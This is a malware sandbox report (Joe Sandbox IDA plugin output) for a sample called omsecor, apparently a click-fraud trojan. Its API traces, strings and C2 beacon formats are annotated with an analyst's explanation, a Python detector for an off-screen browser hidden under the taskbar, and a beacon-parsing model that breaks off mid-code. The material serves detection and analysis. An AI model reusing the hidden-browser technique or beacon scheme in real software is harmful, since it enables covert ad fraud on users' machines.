                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: CloseQueryValue
                  • String ID:
                  • API String ID: 3356406503-0
                  • Opcode ID: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
                  • Instruction ID: 7cb27e63b8b96f7a1a34dd7d249ffcc2d4336ce0f7aa5f451266b78b49120899
                  • Opcode Fuzzy Hash: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
                  • Instruction Fuzzy Hash: DCE06D7A000208BBEF104F94CD09BD97BB9EB44358F208464BA00A6150D67596149B14

                  Control-flow Graph (basic blocks, with successor blocks):
                  • 313: 406d14-406d20, InternetAttemptConnect -> 314, 315
                  • 314: 406d22-406d25
                  • 315: 406d26-406d41, InternetOpenW
                  APIs
                  • InternetAttemptConnect.WININET(00000000), ref: 00406D18
                  • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00406D2C
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: Internet$AttemptConnectOpen
                  • String ID:
                  • API String ID: 2984283330-0
                  • Opcode ID: 77bbdc1ab6611dce8fe5f9a2cfb0e06ed6a4e54537c27329ce6246ada380d11e
                  • Instruction ID: 3045e06cac02f36cd47ad2bbc893350a3e6c997d3593ce6e368a9b0161d3b649
                  • Opcode Fuzzy Hash: 77bbdc1ab6611dce8fe5f9a2cfb0e06ed6a4e54537c27329ce6246ada380d11e
                  • Instruction Fuzzy Hash: 04D05E713171312BE7345B763E48ACB2E4CDF02A61701043AF406D8090D6348851C6E8
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,00420840,00001000,00000000,00000000,00000000,?,0040B320,00000000,?,0040B3E0), ref: 0040B103
                  • InternetSetPerSiteCookieDecisionW.WININET(begun.ru,00000005), ref: 0040B16F
                  • GetLastError.KERNEL32(00000004,?,0040B320,00000000,?,0040B3E0), ref: 0040B188
                  • CreateThread.KERNEL32(00000000,00000000,Function_0000B023,?,00000000,00000000), ref: 0040B1C3
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: CookieCreateDecisionErrorFileInternetLastModuleNameSiteThread
                  • String ID: \netprotdrvss.exe$begun.ru
                  • API String ID: 2887986221-2660752650
                  • Opcode ID: 72f3bde2a2d827b3c721072f775774581fb941fcacc32120eed56e62724ecf90
                  • Instruction ID: dc85dbecd2d93a1c92e95c54703b850062b4355e184197ecdf44903e32880826
                  • Opcode Fuzzy Hash: 72f3bde2a2d827b3c721072f775774581fb941fcacc32120eed56e62724ecf90
                  • Instruction Fuzzy Hash: 4351F571A00218BBEB206F65DC89AAF3769EB44349F00447BF904BA1D1D77C8D51CBAE
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: Sleep
                  • String ID: .html$8@$CsM$From: $Via: $^key=$ftp$hOA
                  • API String ID: 3472027048-1081452883
                  • Opcode ID: d8c307949237e19763c5e60e3dec01313537889ddc644ade6cf88722956defec
                  • Instruction ID: 3376cbd9a830c5581772f61034da1910d267ee329a165acd0f4726bddbbbde03
                  • Opcode Fuzzy Hash: d8c307949237e19763c5e60e3dec01313537889ddc644ade6cf88722956defec
                  • Instruction Fuzzy Hash: 4E419431A0091887CB24E7A29D529EF73A9EF40318F54407FE905B71D1EA7C9E898F5D
                  APIs
                  • DeleteFileW.KERNEL32(?), ref: 00407043
                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000004,00000080,00000000), ref: 0040705D
                  • GetLastError.KERNEL32 ref: 00407079
                  • SetEndOfFile.KERNEL32(?), ref: 0040708F
                  • InternetOpenUrlW.WININET(?,?,00000000,80000000,00000000), ref: 004070A9
                  • CloseHandle.KERNEL32(?), ref: 004070BB
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: File$CloseCreateDeleteErrorHandleInternetLastOpen
                  • String ID:
                  • API String ID: 3711279109-0
                  • Opcode ID: 89bc675b35fb8e2eee68dc50edc98837eed05b9f43fe5ca330cba4f7d07cf5ae
                  • Instruction ID: 9d8a11a16b3c0a9aa44c9dcc38c8aa686dfb91ece0f3f59227d733df7bad94bb
                  • Opcode Fuzzy Hash: 89bc675b35fb8e2eee68dc50edc98837eed05b9f43fe5ca330cba4f7d07cf5ae
                  • Instruction Fuzzy Hash: 48313471800119EFEB119FA1DE85AEE7BBDFB04344F104872F652B61A0D731AE21DB66
                  APIs
                  • CharLowerW.USER32(?,?,?,?,?,?), ref: 0040933E
                  • SysFreeString.OLEAUT32(?), ref: 00409359
                  • SysFreeString.OLEAUT32(?), ref: 00409362
                  • SysAllocString.OLEAUT32(?), ref: 004093B8
                  • SysAllocString.OLEAUT32(javascript), ref: 004093C1
                  • SysFreeString.OLEAUT32(00000000), ref: 004093E3
                  • SysFreeString.OLEAUT32(00000000), ref: 004093E6
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: String$Free$Alloc$CharLower
                  • String ID: http:$javascript
                  • API String ID: 1987340527-3435494457
                  • Opcode ID: 713b06055eefad9f5422e5b9f5fb5af6d58bbbe1ec79e9ea68907389bd6c3b4b
                  • Instruction ID: 0b4048b57b081e67726dd44363989906ad2532c65c6ed0c60c908aefe346602b
                  • Opcode Fuzzy Hash: 713b06055eefad9f5422e5b9f5fb5af6d58bbbe1ec79e9ea68907389bd6c3b4b
                  • Instruction Fuzzy Hash: 6A310A71A00119AFDB04DFA6C889EAEB7B8EF48314B144469E805EB291D775AD41CF64
                  APIs
                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000), ref: 00406B2A
                    • Part of subcall function 004069C0: RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                    • Part of subcall function 004069C0: RegCloseKey.KERNEL32(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000), ref: 00406B8C
                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000), ref: 00406C17
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: Open$CloseQueryValue
                  • String ID: CLSID$SOFTWARE\Classes\MIME\Database\Content Type\$application/x-javascript$text/html$text/javascript
                  • API String ID: 3546245721-1332223170
                  • Opcode ID: b8f2284a7884e1d84c5472764473ad81ef61371c27a8aebe337e069d7a055d2a
                  • Instruction ID: b356448af2dda310db5a41c348b39e69e2b2ee30590ea213815e442ef4722270
                  • Opcode Fuzzy Hash: b8f2284a7884e1d84c5472764473ad81ef61371c27a8aebe337e069d7a055d2a
                  • Instruction Fuzzy Hash: 0A4142B2650118AAEB10D6519E81BEB73FCEB44309F1144BBE705F2080FB789F598F69
                  APIs
                  • SysAllocString.OLEAUT32(eventConn), ref: 0040A18D
                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0040A1D4
                  • SetParent.USER32(?,00000000), ref: 0040A1E2
                  • GetWindowLongW.USER32(?,000000EC), ref: 0040A1ED
                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0040A1FE
                  • SetWindowPos.USER32(?,00000001,00001388,00001388,00000010,?,00000000), ref: 0040A21E
                    • Part of subcall function 0040A0B5: CoInitialize.OLE32(00000000), ref: 0040A0C0
                    • Part of subcall function 0040A0B5: GetModuleHandleW.KERNEL32(00000000,00000000), ref: 0040A0CE
                    • Part of subcall function 0040A0B5: CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: Window$Long$AllocCreateFindHandleInitializeModuleParentString
                  • String ID: Shell_TrayWnd$eventConn
                  • API String ID: 2141107913-3455059086
                  • Opcode ID: 2066f8b397b36b8e779d0438fd1e5f75721f75fac11e843927efdeb34d7bad55
                  • Instruction ID: 39c15930e577ecb7297998fc23ff8408fdcdb7101606cb16b0d9d8475b405f16
                  • Opcode Fuzzy Hash: 2066f8b397b36b8e779d0438fd1e5f75721f75fac11e843927efdeb34d7bad55
                  • Instruction Fuzzy Hash: 05216834900214EFDB10AFA4CD89FAB7BB9EF0A311F2046B5F901EA2A1C7755D54CB96
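The window handling at 0040A1D4-0040A21E, read together with its subcall at 0040A0B5, is the part of this listing worth dwelling on. The subcall calls CoInitialize and creates a WS_POPUP (80000000) window of class AtlAxWin hosting Shell.Explorer, i.e. an embedded Internet Explorer control. The caller then locates the taskbar (FindWindowW "Shell_TrayWnd"), makes the control a child of it with SetParent, zeroes the extended style (the index is printed as 000000EC, the low byte of GWL_EXSTYLE, -20) and calls SetWindowPos with hWndInsertAfter 1 (HWND_BOTTOM), X = Y = 00001388 (5000 pixels) and cx = 00000010 (16 pixels). The browser therefore runs in a 16-pixel-wide window parked far outside any screen, which fits the searches/clicks counters in the jstat beacon string that appears later in this listing. The check below is an added example, not part of the report and not the sample's own code: it flags descendants of Shell_TrayWnd that are browser hosts or that lie entirely off-screen. The record shape, the class-name list, the 1920x1080 screen size and the SAMPLE_WINDOWS records are assumptions; snapshot_tray_children() is only meant to run on Windows.

```python
"""Flag a browser control reparented under the taskbar and pushed off-screen.

Added example, not code from the sample or from Joe Sandbox. The window
records in SAMPLE_WINDOWS are constructed; on Windows snapshot_tray_children()
collects real ones with ctypes in the same record shape.
"""
import sys

TRAY_CLASS = "Shell_TrayWnd"
# Classes that mean "an embedded IE / WebBrowser control": the ATL host window
# created in the subcall (AtlAxWin, carrying a version suffix in newer ATL
# builds) and the classes such a control creates for Shell.Explorer.
BROWSER_HOST_PREFIXES = ("AtlAxWin", "Shell Embedding", "Internet Explorer_Server")


def classify(window, screen_w, screen_h):
    """Return the reasons this window looks hostile (empty list = benign).

    window: dict(hwnd, cls, root_cls, left, top, width, height), where
    root_cls is the class of the top-level ancestor (GA_ROOT).
    """
    reasons = []
    if window["root_cls"] != TRAY_CLASS:
        return reasons
    if window["cls"].startswith(BROWSER_HOST_PREFIXES):
        reasons.append("browser control hosted under Shell_TrayWnd")
    off_screen = (
        window["left"] >= screen_w or window["top"] >= screen_h
        or window["left"] + window["width"] <= 0
        or window["top"] + window["height"] <= 0
    )
    if off_screen:
        reasons.append("positioned entirely off-screen")
    return reasons


def find_hidden_browser_windows(windows, screen_w, screen_h):
    """(hwnd, reasons) for every flagged window in the given records."""
    flagged = []
    for w in windows:
        reasons = classify(w, screen_w, screen_h)
        if reasons:
            flagged.append((w["hwnd"], reasons))
    return flagged


def snapshot_tray_children():
    """Windows only: every descendant of the taskbar, as classify() records.
    EnumChildWindows recurses, so nested browser windows are seen too."""
    import ctypes
    from ctypes import wintypes
    user32 = ctypes.WinDLL("user32", use_last_error=True)
    WNDENUMPROC = ctypes.WINFUNCTYPE(wintypes.BOOL, wintypes.HWND, wintypes.LPARAM)
    user32.FindWindowW.argtypes = [wintypes.LPCWSTR, wintypes.LPCWSTR]
    user32.FindWindowW.restype = wintypes.HWND
    user32.EnumChildWindows.argtypes = [wintypes.HWND, WNDENUMPROC, wintypes.LPARAM]
    user32.GetClassNameW.argtypes = [wintypes.HWND, wintypes.LPWSTR, ctypes.c_int]
    user32.GetWindowRect.argtypes = [wintypes.HWND, ctypes.POINTER(wintypes.RECT)]
    user32.GetAncestor.argtypes = [wintypes.HWND, wintypes.UINT]
    user32.GetAncestor.restype = wintypes.HWND
    GA_ROOT = 2

    def class_name(hwnd):
        buf = ctypes.create_unicode_buffer(256)
        user32.GetClassNameW(hwnd, buf, 256)
        return buf.value

    records = []

    @WNDENUMPROC
    def on_child(hwnd, _lparam):
        rect = wintypes.RECT()
        user32.GetWindowRect(hwnd, ctypes.byref(rect))
        records.append({
            "hwnd": hwnd, "cls": class_name(hwnd),
            "root_cls": class_name(user32.GetAncestor(hwnd, GA_ROOT)),
            "left": rect.left, "top": rect.top,
            "width": rect.right - rect.left, "height": rect.bottom - rect.top,
        })
        return True

    tray = user32.FindWindowW(TRAY_CLASS, None)
    if tray:
        user32.EnumChildWindows(tray, on_child, 0)
    return records


# Constructed records (assumption): a normal taskbar child, a 16x16 browser
# host parked at (5000, 5000) as SetWindowPos receives in the listing, and an
# ordinary IE frame that must not be flagged.
SAMPLE_WINDOWS = [
    {"hwnd": 0x10010, "cls": "ReBarWindow32", "root_cls": TRAY_CLASS,
     "left": 0, "top": 1040, "width": 1920, "height": 40},
    {"hwnd": 0x20020, "cls": "AtlAxWin", "root_cls": TRAY_CLASS,
     "left": 5000, "top": 5000, "width": 16, "height": 16},
    {"hwnd": 0x30030, "cls": "Shell Embedding", "root_cls": "IEFrame",
     "left": 100, "top": 100, "width": 800, "height": 600},
]

if __name__ == "__main__":
    windows = snapshot_tray_children() if sys.platform == "win32" else SAMPLE_WINDOWS
    for hwnd, reasons in find_hidden_browser_windows(windows, 1920, 1080):
        print(hex(hwnd), "; ".join(reasons))
```

Run it in the session of the user whose taskbar is suspect, since window enumeration is per desktop. A clean taskbar has children such as ReBarWindow32 and TrayNotifyWnd; any AtlAxWin or Shell Embedding descendant of Shell_TrayWnd is worth resolving to its owning process with GetWindowThreadProcessId before anything else.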
                  APIs
                  • CreateWaitableTimerW.KERNEL32(00000000,00000001,00000000), ref: 00407374
                  • GetLocalTime.KERNEL32(?), ref: 00407387
                  • GetLocalTime.KERNEL32(?), ref: 0040738D
                  • GetTimeZoneInformation.KERNEL32(?), ref: 004073C2
                  • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407412
                  • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040741C
                  • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,00989680,00000000), ref: 0040747A
                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00989680,00000000), ref: 00407485
                  • CloseHandle.KERNEL32(?,?,?,00989680,00000000), ref: 0040748E
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: Time$FileLocalSystemTimerWaitable$CloseCreateHandleInformationObjectSingleWaitZone
                  • String ID:
                  • API String ID: 3166187867-0
                  • Opcode ID: 8616424921b6ce0bb56b9c9dfbc93343bf37786535cdacee7c7c77324956f8a5
                  • Instruction ID: 26b14636c49f8a61fb06fac8b942a3fa68f3078aba47330515a101c34858e503
                  • Opcode Fuzzy Hash: 8616424921b6ce0bb56b9c9dfbc93343bf37786535cdacee7c7c77324956f8a5
                  • Instruction Fuzzy Hash: 8B316FB2D1022DAACF04EBE5DD459EEB7BDEF44304F10406AF901B3290E7746A04DB69
                  APIs
                  • SysAllocString.OLEAUT32(?), ref: 004099EB
                  • SysAllocString.OLEAUT32(?), ref: 004099F9
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: AllocString
                  • String ID: </domain>$</url>$<domain>$<url>$http://
                  • API String ID: 2525500382-924421446
                  • Opcode ID: c25fc9fce4e3a5af282b7e8b70485abd1f5e468527c2347077a4c4f87a84cc63
                  • Instruction ID: c36137c4092f7a01c2c9ac5e3109157182881aca1e17db191de13133e2ad13bf
                  • Opcode Fuzzy Hash: c25fc9fce4e3a5af282b7e8b70485abd1f5e468527c2347077a4c4f87a84cc63
                  • Instruction Fuzzy Hash: D521D876600218A6DB61AB59CC41BDB33E4FB44794F14407FE508B32C2EB785E4D4F99
                  APIs
                    • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                  • Sleep.KERNEL32(00002710,00000000,00000400,00000000), ref: 0040ACAE
                  • Sleep.KERNEL32(0000EA60), ref: 0040AD76
                  • Sleep.KERNEL32(00002710), ref: 0040ADA4
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: Sleep$AttemptConnectInternet
                  • String ID: 0$^rcn=1$d$hOA$job^rev=%s^os=%s
                  • API String ID: 362191241-2593661552
                  • Opcode ID: c6d12f3f342631a53f4ba21eed34aabb8925de89328c1543a1445e18d084db7e
                  • Instruction ID: b79182b1151443badf469ae5f9ae195c128285790c89deda34db11c37ea10ffc
                  • Opcode Fuzzy Hash: c6d12f3f342631a53f4ba21eed34aabb8925de89328c1543a1445e18d084db7e
                  • Instruction Fuzzy Hash: 0531C471D00208ABCF20ABA6DC859AE77BAEF80309F10847BE505B72C1DA7849558B5B
                  APIs
                  • _ValidateScopeTableHandlers.LIBCMT ref: 0040D892
                  • __FindPESection.LIBCMT ref: 0040D8AC
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: FindHandlersScopeSectionTableValidate
                  • String ID:
                  • API String ID: 876702719-0
                  • Opcode ID: 534d7b056b49e296d3a3fc6e9a3ba6c277fd5c62c59754af54bacd0a8e696194
                  • Instruction ID: 4070355c3de93ac57746f54d9fb9ba92a54bad1974282013f33c457a7dad05b0
                  • Opcode Fuzzy Hash: 534d7b056b49e296d3a3fc6e9a3ba6c277fd5c62c59754af54bacd0a8e696194
                  • Instruction Fuzzy Hash: 96A1C172F042158BCB24CF98D981B6E77B1EB84314F56813AD815A73D0DB39AC49CB9D
                  APIs
                  • SysFreeString.OLEAUT32(?), ref: 004094E6
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: FreeString
                  • String ID:
                  • API String ID: 3341692771-0
                  • Opcode ID: 99a964074df9a43e7876bfa78059f63c2205d652b6a4e0ea0b2e4f8e9ecac31d
                  • Instruction ID: b8745a711dcf8da59f3798694fa3079dcf63c40c9cdbadd59c4d39193402e254
                  • Opcode Fuzzy Hash: 99a964074df9a43e7876bfa78059f63c2205d652b6a4e0ea0b2e4f8e9ecac31d
                  • Instruction Fuzzy Hash: C9214832A00108BBDB01DFAADC44B9E7BB8EF48345F1484B6E805F71A1D774AE41DB84
                  APIs
                  • SysAllocString.OLEAUT32(?), ref: 00409B00
                  • SysAllocString.OLEAUT32(?), ref: 00409B0E
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: AllocString
                  • String ID: </title>$</url>$<title>$<url>
                  • API String ID: 2525500382-2286408829
                  • Opcode ID: c58bfd32acaee4a5c903d43745ebae325062404d958fadf76014dbdfc3d1efc4
                  • Instruction ID: e94fff7a9c4556839c155ffec7726d55edf757161a42396596b5093e86978141
                  • Opcode Fuzzy Hash: c58bfd32acaee4a5c903d43745ebae325062404d958fadf76014dbdfc3d1efc4
                  • Instruction Fuzzy Hash: 4F01DB7564021CA7DB116A55CC41FD637A8BB44799F044077FA04F32C3E978AA0C4BA4
                  APIs
                    • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                  • Sleep.KERNEL32(00002710), ref: 0040A91C
                  • Sleep.KERNEL32(00002710), ref: 0040AAC1
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 0040AAE9
                  • HeapFree.KERNEL32(00000000), ref: 0040AAF0
                  Strings
                  • jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s, xrefs: 0040A957
                  • 0, xrefs: 0040AA5B
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: HeapSleep$AttemptConnectFreeInternetProcess
                  • String ID: 0$jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s
                  • API String ID: 3713053250-1268808612
                  • Opcode ID: 9ba27d41419271b0192402f6c87428b96ec0abdecb4ecd520169770693f9ee02
                  • Instruction ID: cb73c9a78e41fc00613c6eff30345c36a412e41c8c720ed22b53be089701fd16
                  • Opcode Fuzzy Hash: 9ba27d41419271b0192402f6c87428b96ec0abdecb4ecd520169770693f9ee02
                  • Instruction Fuzzy Hash: 88515072A00218A6CF10EB95DC959DF737DEF44308F40447BF406B7281EB789A958FAA
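Across this listing the sample's network side is visible only as format strings and WinINet calls: the beacon bodies "job^rev=%s^os=%s" (with the "^rcn=1" suffix in the same function, 0040ACAE-0040ADA4) and "jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s" (0040A957), the "^key=" fragment in the Sleep function, the tagged task fields <url>, <domain> and <title> next to an "http://" literal (004099EB, 00409B00), and a request path of InternetConnectW on port 00000050 (80), HttpOpenRequestW with POST, HttpSendRequestW and InternetReadFile, after an InternetOpenW whose first argument, the agent string, is 00000000. The model below is an added example, not the sample's code and not Joe Sandbox output: it builds and parses the caret-delimited beacon, extracts tasks from the tag format, and scans constructed requests for the beacon shape. The task grouping rule (each <url> opens a task), the use of "http://" as a default scheme, and the SAMPLE_REQUESTS and SAMPLE_TASKS values are assumptions.

```python
"""Model of the beacon and task strings visible in the listing.

Added example, not code from the sample or from Joe Sandbox. The grouping
rule for tasks, the default scheme, and all sample bodies are assumptions.
"""
import re

SEP = "^"
KNOWN_COMMANDS = {"job", "jstat"}          # command tokens seen in the format strings
TASK_TAGS = ("url", "domain", "title")     # tag names seen in the listing


def build_beacon(command, fields, rcn=False):
    """Serialise a beacon body the way the format strings do: the command,
    then key=value pairs, all joined by '^', optionally ending in '^rcn=1'."""
    if SEP in command or "=" in command:
        raise ValueError("command must not contain the separator or '='")
    for key, value in fields.items():
        if SEP in key or SEP in str(value) or "=" in key:
            raise ValueError("'^' is the field separator and '=' the key terminator")
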